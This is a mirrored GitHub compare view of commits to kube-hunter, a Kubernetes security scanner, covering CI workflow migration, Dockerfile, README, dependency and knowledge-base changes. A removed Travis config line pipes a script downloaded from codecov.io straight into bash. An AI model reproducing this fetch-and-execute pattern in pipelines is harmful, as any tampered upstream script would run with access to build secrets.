mirror of
https://github.com/aquasecurity/kube-hunter.git
synced 2026-02-14 18:09:56 +00:00
Compare commits
40 Commits
add_plugin
...
update-dep
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
05bc6ea4f3 | ||
|
|
cdbc3dc12b | ||
|
|
d208b43532 | ||
|
|
42250d9f62 | ||
|
|
d94d86a4c1 | ||
|
|
a1c2c3ee3e | ||
|
|
6aeee7f49d | ||
|
|
f95df8172b | ||
|
|
a3ad928f29 | ||
|
|
22d6676e08 | ||
|
|
b9e0ef30e8 | ||
|
|
693d668d0a | ||
|
|
2e4684658f | ||
|
|
f5e8b14818 | ||
|
|
05094a9415 | ||
|
|
8acedf2e7d | ||
|
|
14ca1b8bce | ||
|
|
5a578fd8ab | ||
|
|
bf7023d01c | ||
|
|
d7168af7d5 | ||
|
|
35873baa12 | ||
|
|
a476d9383f | ||
|
|
6a3c7a885a | ||
|
|
b6be309651 | ||
|
|
0d5b3d57d3 | ||
|
|
69057acf9b | ||
|
|
e63200139e | ||
|
|
ad4cfe1c11 | ||
|
|
24b5a709ad | ||
|
|
9cadc0ee41 | ||
|
|
3950a1c2f2 | ||
|
|
7530e6fee3 | ||
|
|
72ae8c0719 | ||
|
|
b341124c20 | ||
|
|
3e06647b4c | ||
|
|
cd1f79a658 | ||
|
|
2428e2e869 | ||
|
|
daf53cb484 | ||
|
|
d6ca666447 | ||
|
|
3ba926454a |
2
.github/PULL_REQUEST_TEMPLATE.md
vendored
2
.github/PULL_REQUEST_TEMPLATE.md
vendored
@@ -7,7 +7,7 @@
|
||||
Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
|
||||
|
||||
## Contribution Guidelines
|
||||
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
|
||||
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).
|
||||
|
||||
## Fixed Issues
|
||||
|
||||
|
||||
14
.github/workflows/lint.yml
vendored
Normal file
14
.github/workflows/lint.yml
vendored
Normal file
@@ -0,0 +1,14 @@
|
||||
---
|
||||
name: Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-20.04
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/setup-python@v2
|
||||
- uses: pre-commit/action@v2.0.0
|
||||
- uses: ibiqlik/action-yamllint@v3
|
||||
65
.github/workflows/publish.yml
vendored
Normal file
65
.github/workflows/publish.yml
vendored
Normal file
@@ -0,0 +1,65 @@
|
||||
---
|
||||
name: Publish
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- "v*"
|
||||
env:
|
||||
ALIAS: aquasecurity
|
||||
REP: kube-hunter
|
||||
jobs:
|
||||
publish:
|
||||
name: Publish
|
||||
runs-on: ubuntu-18.04
|
||||
steps:
|
||||
- name: Check Out Repo
|
||||
uses: actions/checkout@v2
|
||||
- name: Set up QEMU
|
||||
uses: docker/setup-qemu-action@v1
|
||||
- name: Set up Docker Buildx
|
||||
id: buildx
|
||||
uses: docker/setup-buildx-action@v1
|
||||
- name: Cache Docker layers
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /tmp/.buildx-cache
|
||||
key: ${{ runner.os }}-buildxarch-${{ github.sha }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-buildxarch-
|
||||
- name: Login to Docker Hub
|
||||
uses: docker/login-action@v1
|
||||
with:
|
||||
username: ${{ secrets.DOCKERHUB_USER }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
- name: Login to ECR
|
||||
uses: docker/login-action@v1
|
||||
with:
|
||||
registry: public.ecr.aws
|
||||
username: ${{ secrets.ECR_ACCESS_KEY_ID }}
|
||||
password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
|
||||
- name: Get version
|
||||
id: get_version
|
||||
uses: crazy-max/ghaction-docker-meta@v1
|
||||
with:
|
||||
images: ${{ env.REP }}
|
||||
tag-semver: |
|
||||
{{version}}
|
||||
|
||||
- name: Build and push - Docker/ECR
|
||||
id: docker_build
|
||||
uses: docker/build-push-action@v2
|
||||
with:
|
||||
context: .
|
||||
platforms: linux/amd64
|
||||
builder: ${{ steps.buildx.outputs.name }}
|
||||
push: true
|
||||
tags: |
|
||||
${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
|
||||
public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
|
||||
${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
|
||||
public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
|
||||
cache-from: type=local,src=/tmp/.buildx-cache/release
|
||||
cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release
|
||||
|
||||
- name: Image digest
|
||||
run: echo ${{ steps.docker_build.outputs.digest }}
|
||||
53
.github/workflows/release.yml
vendored
Normal file
53
.github/workflows/release.yml
vendored
Normal file
@@ -0,0 +1,53 @@
|
||||
---
|
||||
on:
|
||||
push:
|
||||
# Sequence of patterns matched against refs/tags
|
||||
tags:
|
||||
- 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10
|
||||
|
||||
name: Release
|
||||
|
||||
jobs:
|
||||
build:
|
||||
name: Upload Release Asset
|
||||
runs-on: ubuntu-16.04
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: '3.9'
|
||||
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
python -m pip install -U pip
|
||||
python -m pip install -r requirements-dev.txt
|
||||
|
||||
- name: Build project
|
||||
shell: bash
|
||||
run: |
|
||||
make pyinstaller
|
||||
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
uses: actions/create-release@v1
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
tag_name: ${{ github.ref }}
|
||||
release_name: ${{ github.ref }}
|
||||
draft: false
|
||||
prerelease: false
|
||||
|
||||
- name: Upload Release Asset
|
||||
id: upload-release-asset
|
||||
uses: actions/upload-release-asset@v1
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
upload_url: ${{ steps.create_release.outputs.upload_url }}
|
||||
asset_path: ./dist/kube-hunter
|
||||
asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
|
||||
asset_content_type: application/octet-stream
|
||||
55
.github/workflows/test.yml
vendored
Normal file
55
.github/workflows/test.yml
vendored
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
name: Test
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
env:
|
||||
FORCE_COLOR: 1
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
fail-fast: false
|
||||
matrix:
|
||||
python-version: ["3.6", "3.7", "3.8", "3.9"]
|
||||
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Python ${{ matrix.python-version }}
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
|
||||
- name: Get pip cache dir
|
||||
id: pip-cache
|
||||
run: |
|
||||
echo "::set-output name=dir::$(pip cache dir)"
|
||||
|
||||
- name: Cache
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: ${{ steps.pip-cache.outputs.dir }}
|
||||
key:
|
||||
${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
|
||||
restore-keys: |
|
||||
${{ matrix.os }}-${{ matrix.python-version }}-
|
||||
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
python -m pip install -U pip
|
||||
python -m pip install -U wheel
|
||||
python -m pip install -r requirements.txt
|
||||
python -m pip install -r requirements-dev.txt
|
||||
|
||||
- name: Test
|
||||
shell: bash
|
||||
run: |
|
||||
make test
|
||||
|
||||
- name: Upload coverage
|
||||
uses: codecov/codecov-action@v1
|
||||
with:
|
||||
name: ${{ matrix.os }} Python ${{ matrix.python-version }}
|
||||
1
.gitignore
vendored
1
.gitignore
vendored
@@ -24,6 +24,7 @@ var/
|
||||
*.egg
|
||||
*.spec
|
||||
.eggs
|
||||
pip-wheel-metadata
|
||||
|
||||
# Directory Cache Files
|
||||
.DS_Store
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
---
|
||||
repos:
|
||||
- repo: https://github.com/psf/black
|
||||
rev: stable
|
||||
hooks:
|
||||
- id: black
|
||||
- repo: https://gitlab.com/pycqa/flake8
|
||||
rev: 3.7.9
|
||||
hooks:
|
||||
- id: flake8
|
||||
additional_dependencies: [flake8-bugbear]
|
||||
- repo: https://github.com/psf/black
|
||||
rev: stable
|
||||
hooks:
|
||||
- id: black
|
||||
- repo: https://gitlab.com/pycqa/flake8
|
||||
rev: 3.7.9
|
||||
hooks:
|
||||
- id: flake8
|
||||
additional_dependencies: [flake8-bugbear]
|
||||
|
||||
20
.travis.yml
20
.travis.yml
@@ -1,20 +0,0 @@
|
||||
group: travis_latest
|
||||
language: python
|
||||
cache: pip
|
||||
python:
|
||||
- "3.6"
|
||||
- "3.7"
|
||||
- "3.8"
|
||||
install:
|
||||
- pip install -r requirements.txt
|
||||
- pip install -r requirements-dev.txt
|
||||
before_script:
|
||||
- make lint-check
|
||||
script:
|
||||
- make test
|
||||
after_success:
|
||||
- bash <(curl -s https://codecov.io/bash)
|
||||
notifications:
|
||||
email:
|
||||
on_success: change
|
||||
on_failure: always
|
||||
6
.yamllint
Normal file
6
.yamllint
Normal file
@@ -0,0 +1,6 @@
|
||||
---
|
||||
extends: default
|
||||
|
||||
rules:
|
||||
line-length: disable
|
||||
truthy: disable
|
||||
10
Dockerfile
10
Dockerfile
@@ -16,4 +16,14 @@ RUN make deps
|
||||
COPY . .
|
||||
RUN make install
|
||||
|
||||
FROM python:3.8-alpine
|
||||
|
||||
RUN apk add --no-cache \
|
||||
tcpdump \
|
||||
ebtables && \
|
||||
apk upgrade --no-cache
|
||||
|
||||
COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
|
||||
COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
|
||||
|
||||
ENTRYPOINT ["kube-hunter"]
|
||||
|
||||
26
README.md
26
README.md
@@ -1,12 +1,18 @@
|
||||

|
||||

|
||||
|
||||
[](https://travis-ci.org/aquasecurity/kube-hunter)
|
||||
[](https://codecov.io/gh/aquasecurity/kube-hunter)
|
||||
[![GitHub Release][release-img]][release]
|
||||
![Downloads][download]
|
||||
![Docker Pulls][docker-pull]
|
||||
[](https://github.com/aquasecurity/kube-hunter/actions)
|
||||
[](https://codecov.io/gh/aquasecurity/kube-hunter)
|
||||
[](https://github.com/psf/black)
|
||||
[](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
|
||||
[](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE)
|
||||
[](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")
|
||||
|
||||
|
||||
[download]: https://img.shields.io/github/downloads/aquasecurity/kube-hunter/total?logo=github
|
||||
[release-img]: https://img.shields.io/github/release/aquasecurity/kube-hunter.svg?logo=github
|
||||
[release]: https://github.com/aquasecurity/kube-hunter/releases
|
||||
[docker-pull]: https://img.shields.io/docker/pulls/aquasec/kube-hunter?logo=docker&label=docker%20pulls%20%2F%20kube-hunter
|
||||
|
||||
kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**
|
||||
|
||||
@@ -14,9 +20,9 @@ kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was d
|
||||
|
||||
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
|
||||
|
||||
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](kube_hunter/CONTRIBUTING.md).
|
||||
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).
|
||||
|
||||
[](https://youtu.be/s2-6rTkH8a8?t=57s)
|
||||
[](https://youtu.be/s2-6rTkH8a8?t=57s)
|
||||
|
||||
Table of Contents
|
||||
=================
|
||||
@@ -34,6 +40,7 @@ Table of Contents
|
||||
* [Prerequisites](#prerequisites)
|
||||
* [Container](#container)
|
||||
* [Pod](#pod)
|
||||
* [Contribution](#contribution)
|
||||
|
||||
## Hunting
|
||||
|
||||
@@ -174,5 +181,8 @@ The example `job.yaml` file defines a Job that will run kube-hunter in a pod, us
|
||||
* Find the pod name with `kubectl describe job kube-hunter`
|
||||
* View the test results with `kubectl logs <pod name>`
|
||||
|
||||
## Contribution
|
||||
To read the contribution guidelines, <a href="https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md"> Click here </a>
|
||||
|
||||
## License
|
||||
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).
|
||||
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE).
|
||||
|
||||
17
SECURITY.md
Normal file
17
SECURITY.md
Normal file
@@ -0,0 +1,17 @@
|
||||
# Security Policy
|
||||
|
||||
## Supported Versions
|
||||
|
||||
| Version | Supported |
|
||||
| --------- | ------------------ |
|
||||
| 0.4.x | :white_check_mark: |
|
||||
| 0.3.x | :white_check_mark: |
|
||||
|
||||
## Reporting a Vulnerability
|
||||
We encourage you to find vulnerabilities in kube-hunter.
|
||||
The process is simple, just report a Bug issue. and we will take a look at this.
|
||||
If you prefer to disclose privately, you can write to one of the security maintainers at:
|
||||
|
||||
| Name | Email |
|
||||
| ----------- | ------------------ |
|
||||
| Daniel Sagi | daniel.sagi@aquasec.com |
|
||||
@@ -1,11 +1,12 @@
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
activesupport (4.2.11.1)
|
||||
i18n (~> 0.7)
|
||||
activesupport (6.0.3.4)
|
||||
concurrent-ruby (~> 1.0, >= 1.0.2)
|
||||
i18n (>= 0.7, < 2)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
tzinfo (~> 1.1)
|
||||
zeitwerk (~> 2.2, >= 2.2.2)
|
||||
addressable (2.7.0)
|
||||
public_suffix (>= 2.0.2, < 5.0)
|
||||
coffee-script (2.4.1)
|
||||
@@ -15,65 +16,67 @@ GEM
|
||||
colorator (1.1.0)
|
||||
commonmarker (0.17.13)
|
||||
ruby-enum (~> 0.5)
|
||||
concurrent-ruby (1.1.5)
|
||||
dnsruby (1.61.3)
|
||||
addressable (~> 2.5)
|
||||
em-websocket (0.5.1)
|
||||
concurrent-ruby (1.1.7)
|
||||
dnsruby (1.61.5)
|
||||
simpleidn (~> 0.1)
|
||||
em-websocket (0.5.2)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
ethon (0.12.0)
|
||||
ffi (>= 1.3.0)
|
||||
eventmachine (1.2.7)
|
||||
execjs (2.7.0)
|
||||
faraday (0.17.0)
|
||||
faraday (1.3.0)
|
||||
faraday-net_http (~> 1.0)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.11.1)
|
||||
ruby2_keywords
|
||||
faraday-net_http (1.0.1)
|
||||
ffi (1.14.2)
|
||||
forwardable-extended (2.6.0)
|
||||
gemoji (3.0.1)
|
||||
github-pages (201)
|
||||
activesupport (= 4.2.11.1)
|
||||
github-pages (209)
|
||||
github-pages-health-check (= 1.16.1)
|
||||
jekyll (= 3.8.5)
|
||||
jekyll-avatar (= 0.6.0)
|
||||
jekyll (= 3.9.0)
|
||||
jekyll-avatar (= 0.7.0)
|
||||
jekyll-coffeescript (= 1.1.1)
|
||||
jekyll-commonmark-ghpages (= 0.1.6)
|
||||
jekyll-default-layout (= 0.1.4)
|
||||
jekyll-feed (= 0.11.0)
|
||||
jekyll-feed (= 0.15.1)
|
||||
jekyll-gist (= 1.5.0)
|
||||
jekyll-github-metadata (= 2.12.1)
|
||||
jekyll-mentions (= 1.4.1)
|
||||
jekyll-optional-front-matter (= 0.3.0)
|
||||
jekyll-github-metadata (= 2.13.0)
|
||||
jekyll-mentions (= 1.6.0)
|
||||
jekyll-optional-front-matter (= 0.3.2)
|
||||
jekyll-paginate (= 1.1.0)
|
||||
jekyll-readme-index (= 0.2.0)
|
||||
jekyll-redirect-from (= 0.14.0)
|
||||
jekyll-relative-links (= 0.6.0)
|
||||
jekyll-remote-theme (= 0.4.0)
|
||||
jekyll-readme-index (= 0.3.0)
|
||||
jekyll-redirect-from (= 0.16.0)
|
||||
jekyll-relative-links (= 0.6.1)
|
||||
jekyll-remote-theme (= 0.4.2)
|
||||
jekyll-sass-converter (= 1.5.2)
|
||||
jekyll-seo-tag (= 2.5.0)
|
||||
jekyll-sitemap (= 1.2.0)
|
||||
jekyll-swiss (= 0.4.0)
|
||||
jekyll-seo-tag (= 2.6.1)
|
||||
jekyll-sitemap (= 1.4.0)
|
||||
jekyll-swiss (= 1.0.0)
|
||||
jekyll-theme-architect (= 0.1.1)
|
||||
jekyll-theme-cayman (= 0.1.1)
|
||||
jekyll-theme-dinky (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.2)
|
||||
jekyll-theme-leap-day (= 0.1.1)
|
||||
jekyll-theme-merlot (= 0.1.1)
|
||||
jekyll-theme-midnight (= 0.1.1)
|
||||
jekyll-theme-minimal (= 0.1.1)
|
||||
jekyll-theme-modernist (= 0.1.1)
|
||||
jekyll-theme-primer (= 0.5.3)
|
||||
jekyll-theme-primer (= 0.5.4)
|
||||
jekyll-theme-slate (= 0.1.1)
|
||||
jekyll-theme-tactile (= 0.1.1)
|
||||
jekyll-theme-time-machine (= 0.1.1)
|
||||
jekyll-titles-from-headings (= 0.5.1)
|
||||
jemoji (= 0.10.2)
|
||||
kramdown (= 1.17.0)
|
||||
liquid (= 4.0.0)
|
||||
listen (= 3.1.5)
|
||||
jekyll-titles-from-headings (= 0.5.3)
|
||||
jemoji (= 0.12.0)
|
||||
kramdown (= 2.3.0)
|
||||
kramdown-parser-gfm (= 1.1.0)
|
||||
liquid (= 4.0.3)
|
||||
mercenary (~> 0.3)
|
||||
minima (= 2.5.0)
|
||||
minima (= 2.5.1)
|
||||
nokogiri (>= 1.10.4, < 2.0)
|
||||
rouge (= 3.11.0)
|
||||
rouge (= 3.23.0)
|
||||
terminal-table (~> 1.4)
|
||||
github-pages-health-check (1.16.1)
|
||||
addressable (~> 2.3)
|
||||
@@ -81,27 +84,27 @@ GEM
|
||||
octokit (~> 4.0)
|
||||
public_suffix (~> 3.0)
|
||||
typhoeus (~> 1.3)
|
||||
html-pipeline (2.12.0)
|
||||
html-pipeline (2.14.0)
|
||||
activesupport (>= 2)
|
||||
nokogiri (>= 1.4)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.5)
|
||||
jekyll (3.9.0)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
kramdown (>= 1.17, < 3)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-avatar (0.6.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-avatar (0.7.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-coffeescript (1.1.1)
|
||||
coffee-script (~> 2.2)
|
||||
coffee-script-source (~> 1.11.1)
|
||||
@@ -114,36 +117,37 @@ GEM
|
||||
rouge (>= 2.0, < 4.0)
|
||||
jekyll-default-layout (0.1.4)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-feed (0.11.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-feed (0.15.1)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-gist (1.5.0)
|
||||
octokit (~> 4.2)
|
||||
jekyll-github-metadata (2.12.1)
|
||||
jekyll (~> 3.4)
|
||||
jekyll-github-metadata (2.13.0)
|
||||
jekyll (>= 3.4, < 5.0)
|
||||
octokit (~> 4.0, != 4.4.0)
|
||||
jekyll-mentions (1.4.1)
|
||||
jekyll-mentions (1.6.0)
|
||||
html-pipeline (~> 2.3)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-optional-front-matter (0.3.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-optional-front-matter (0.3.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-paginate (1.1.0)
|
||||
jekyll-readme-index (0.2.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-redirect-from (0.14.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-relative-links (0.6.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-remote-theme (0.4.0)
|
||||
jekyll-readme-index (0.3.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-redirect-from (0.16.0)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-relative-links (0.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-remote-theme (0.4.2)
|
||||
addressable (~> 2.0)
|
||||
jekyll (~> 3.5)
|
||||
rubyzip (>= 1.2.1, < 3.0)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
|
||||
rubyzip (>= 1.3.0, < 3.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-seo-tag (2.5.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-sitemap (1.2.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-swiss (0.4.0)
|
||||
jekyll-seo-tag (2.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-sitemap (1.4.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-swiss (1.0.0)
|
||||
jekyll-theme-architect (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
@@ -153,8 +157,8 @@ GEM
|
||||
jekyll-theme-dinky (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-hacker (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-hacker (0.1.2)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-leap-day (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
@@ -171,8 +175,8 @@ GEM
|
||||
jekyll-theme-modernist (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-primer (0.5.3)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-primer (0.5.4)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-github-metadata (~> 2.9)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-slate (0.1.1)
|
||||
@@ -184,43 +188,49 @@ GEM
|
||||
jekyll-theme-time-machine (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-titles-from-headings (0.5.1)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-titles-from-headings (0.5.3)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-watch (2.2.1)
|
||||
listen (~> 3.0)
|
||||
jemoji (0.10.2)
|
||||
jemoji (0.12.0)
|
||||
gemoji (~> 3.0)
|
||||
html-pipeline (~> 2.2)
|
||||
jekyll (~> 3.0)
|
||||
kramdown (1.17.0)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
kramdown (2.3.0)
|
||||
rexml
|
||||
kramdown-parser-gfm (1.1.0)
|
||||
kramdown (~> 2.0)
|
||||
liquid (4.0.3)
|
||||
listen (3.4.0)
|
||||
rb-fsevent (~> 0.10, >= 0.10.3)
|
||||
rb-inotify (~> 0.9, >= 0.9.10)
|
||||
mercenary (0.3.6)
|
||||
mini_portile2 (2.4.0)
|
||||
minima (2.5.0)
|
||||
jekyll (~> 3.5)
|
||||
mini_portile2 (2.5.0)
|
||||
minima (2.5.1)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-feed (~> 0.9)
|
||||
jekyll-seo-tag (~> 2.1)
|
||||
minitest (5.12.2)
|
||||
minitest (5.14.3)
|
||||
multipart-post (2.1.1)
|
||||
nokogiri (1.10.8)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.14.0)
|
||||
nokogiri (1.11.1)
|
||||
mini_portile2 (~> 2.5.0)
|
||||
racc (~> 1.4)
|
||||
octokit (4.20.0)
|
||||
faraday (>= 0.9)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
pathutil (0.16.2)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.1.1)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.10.0)
|
||||
racc (1.5.2)
|
||||
rb-fsevent (0.10.4)
|
||||
rb-inotify (0.10.1)
|
||||
ffi (~> 1.0)
|
||||
rouge (3.11.0)
|
||||
ruby-enum (0.7.2)
|
||||
rexml (3.2.4)
|
||||
rouge (3.23.0)
|
||||
ruby-enum (0.8.0)
|
||||
i18n
|
||||
ruby_dep (1.5.0)
|
||||
rubyzip (2.0.0)
|
||||
ruby2_keywords (0.0.2)
|
||||
rubyzip (2.3.0)
|
||||
safe_yaml (1.0.5)
|
||||
sass (3.7.4)
|
||||
sass-listen (~> 4.0.0)
|
||||
@@ -230,14 +240,20 @@ GEM
|
||||
sawyer (0.8.2)
|
||||
addressable (>= 2.3.5)
|
||||
faraday (> 0.8, < 2.0)
|
||||
simpleidn (0.1.1)
|
||||
unf (~> 0.1.4)
|
||||
terminal-table (1.8.0)
|
||||
unicode-display_width (~> 1.1, >= 1.1.1)
|
||||
thread_safe (0.3.6)
|
||||
typhoeus (1.3.1)
|
||||
typhoeus (1.4.0)
|
||||
ethon (>= 0.9.0)
|
||||
tzinfo (1.2.5)
|
||||
tzinfo (1.2.9)
|
||||
thread_safe (~> 0.1)
|
||||
unicode-display_width (1.6.0)
|
||||
unf (0.1.4)
|
||||
unf_ext
|
||||
unf_ext (0.0.7.7)
|
||||
unicode-display_width (1.7.0)
|
||||
zeitwerk (2.4.2)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
@@ -247,4 +263,4 @@ DEPENDENCIES
|
||||
jekyll-sitemap
|
||||
|
||||
BUNDLED WITH
|
||||
1.17.2
|
||||
2.2.5
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
---
|
||||
title: kube-hunter
|
||||
description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
|
||||
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
|
||||
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
|
||||
show_downloads: false
|
||||
google_analytics: UA-63272154-1
|
||||
theme: jekyll-theme-minimal
|
||||
@@ -10,7 +11,7 @@ collections:
|
||||
defaults:
|
||||
-
|
||||
scope:
|
||||
path: "" # an empty string here means all files in the project
|
||||
path: "" # an empty string here means all files in the project
|
||||
values:
|
||||
layout: "default"
|
||||
|
||||
|
||||
@@ -12,7 +12,7 @@ Kubernetes API was accessed with Pod Service Account or without Authentication (
|
||||
|
||||
## Remediation
|
||||
|
||||
Secure acess to your Kubernetes API.
|
||||
Secure access to your Kubernetes API.
|
||||
|
||||
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principal.
|
||||
|
||||
@@ -21,4 +21,4 @@ Consider opting out automatic mounting of SA token using `automountServiceAccoun
|
||||
|
||||
## References
|
||||
|
||||
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
|
||||
40
docs/_kb/KHV051.md
Normal file
40
docs/_kb/KHV051.md
Normal file
@@ -0,0 +1,40 @@
|
||||
---
|
||||
vid: KHV051
|
||||
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
|
||||
categories: [Access Risk]
|
||||
---
|
||||
|
||||
